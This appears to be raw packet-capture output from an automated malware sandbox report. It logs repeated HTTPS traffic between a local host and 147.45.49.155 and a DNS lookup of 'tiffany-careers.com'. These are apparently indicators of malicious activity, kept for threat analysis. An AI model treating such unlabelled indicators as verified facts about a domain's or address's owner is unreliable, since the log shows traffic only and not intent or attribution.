                                                                                                                  Dec 23, 2024 07:11:58.882328987 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.882350922 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.887797117 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.887824059 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.887859106 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.887859106 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.887875080 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.888370991 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.888370991 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.892910957 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.892926931 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.896374941 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.896394014 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.898551941 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.898571014 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.900377989 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.900398016 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.904211044 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.904233932 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.904299021 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.904330015 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.908373117 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.909688950 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.909707069 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.909795046 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.909795046 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.909812927 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.912900925 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.992486954 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.992507935 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.992877960 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.992887020 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.996776104 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.997479916 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.997497082 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:58.997608900 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:58.997633934 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.001482010 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.074392080 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.074420929 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.074532986 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.074532986 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.074553967 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.076576948 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.080099106 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.080116034 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.080173016 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.080192089 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.080496073 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.085130930 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.085151911 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.085242033 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.085263968 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.088078976 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.090887070 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.090903997 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.090938091 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.090944052 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.090972900 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.096509933 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.096525908 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.096698999 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.096698999 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.096709013 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.099412918 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.101982117 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.101998091 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.102032900 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.102046013 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.102073908 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.102093935 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.184171915 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.184190989 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.184246063 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.184254885 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.184289932 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.189835072 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.189852953 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.189905882 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.189913034 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.189949036 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.266387939 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.266407013 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.266525984 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.266535044 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.266585112 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.272032022 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.272048950 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.272113085 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.272119045 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.273166895 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.274626017 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.274686098 CET44349740147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:11:59.274687052 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.274775982 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:11:59.319607019 CET49740443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:00.242517948 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:00.242567062 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:00.242643118 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:00.246879101 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:00.246890068 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:01.761317968 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:01.761420965 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:01.763233900 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:01.763246059 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:01.763575077 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:01.769433975 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:01.811343908 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.371130943 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.418878078 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.562931061 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.562963963 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.563014030 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.563028097 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.563041925 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.563059092 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.563066959 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.563075066 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.563090086 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.563112020 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.608511925 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.608535051 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.608592987 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.608623981 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.608635902 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.609803915 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.757184029 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.757204056 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.757304907 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.757344961 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.757386923 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.787980080 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.788003922 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.788058996 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.788077116 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.788095951 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.788114071 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.818243027 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.818301916 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.818321943 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.818341017 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.818357944 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.818376064 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:02.912061930 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.912084103 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:02.912257910 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.760202885 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.760219097 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.760247946 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.766657114 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.766704082 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.766757011 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.766774893 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.766798973 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.766817093 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.908201933 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.908237934 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.908282995 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.908313990 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.908330917 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.908356905 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.916016102 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.916045904 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.916100025 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.916109085 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.916162014 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.916162014 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.922476053 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.922503948 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.922576904 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.922585964 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.922629118 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.930051088 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.930097103 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.930144072 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.930152893 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.930182934 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.930202961 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.937572002 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.937621117 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.937645912 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.937665939 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.937681913 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.937740088 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.944607973 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.944654942 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.944700956 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.944709063 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.944744110 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.944755077 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.952156067 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.952203035 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.952228069 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.952235937 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.952275991 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.958800077 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.958847046 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.958877087 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.958889008 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:03.958914995 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:03.958933115 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.100444078 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.100513935 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.100558996 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.100574017 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.100613117 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.100626945 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.107928991 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.107983112 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.108067989 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.108089924 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.108119965 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.108133078 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.114514112 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.114573002 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.114620924 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.114643097 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.114685059 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.122138023 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.122189045 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.122281075 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.122303009 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.122332096 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.122446060 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.129630089 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.129676104 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.129726887 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.129754066 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.129770994 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.130261898 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.136699915 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.136746883 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.136774063 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.136785030 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.136820078 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.144292116 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.144318104 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.144377947 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.144391060 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.144419909 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.144438028 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.150893927 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.150913000 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.150974035 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.150983095 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.151170969 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.292495966 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.292521000 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.292579889 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.292601109 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.292628050 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.292643070 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.299966097 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.299983978 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.300033092 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.300048113 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.300086975 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.300107002 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.306775093 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.306833982 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.306905031 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.306936026 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.306946993 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.307209969 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.314343929 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.314404964 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.314424038 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.314435005 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.314460993 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.314481974 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.321969032 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.322030067 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.322063923 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.322076082 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.322086096 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.322115898 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.328917980 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.328948975 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.329010963 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.329025984 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.329061985 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.336437941 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.336463928 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.336512089 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.336527109 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.336545944 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.336561918 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.343012094 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.343034983 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.343075037 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.343113899 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.343131065 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.343353987 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.485337973 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.485364914 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.485428095 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.485450029 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.485502005 CET49759443192.168.2.5147.45.49.155
                                                                                                                  Dec 23, 2024 07:12:04.491981983 CET44349759147.45.49.155192.168.2.5
                                                                                                                  Dec 23, 2024 07:12:04.492002964 CET44349759147.45.49.155192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 07:11:32.709031105 CET | 60875 | 53 | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 07:11:32.847862959 CET | 53 | 60875 | 1.1.1.1 | 192.168.2.5
Dec 23, 2024 07:11:58.223584890 CET | 53896 | 53 | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 07:12:07.320462942 CET | 52179 | 53 | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 07:12:07.458822012 CET | 53 | 52179 | 1.1.1.1 | 192.168.2.5
Dec 23, 2024 07:12:25.160470009 CET | 63739 | 53 | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 07:12:25.298820019 CET | 53 | 63739 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 07:11:32.709031105 CET | 192.168.2.5 | 1.1.1.1 | 0x757b | Standard query (0) | tiffany-careers.com | A (IP address) | IN (0x0001) | false
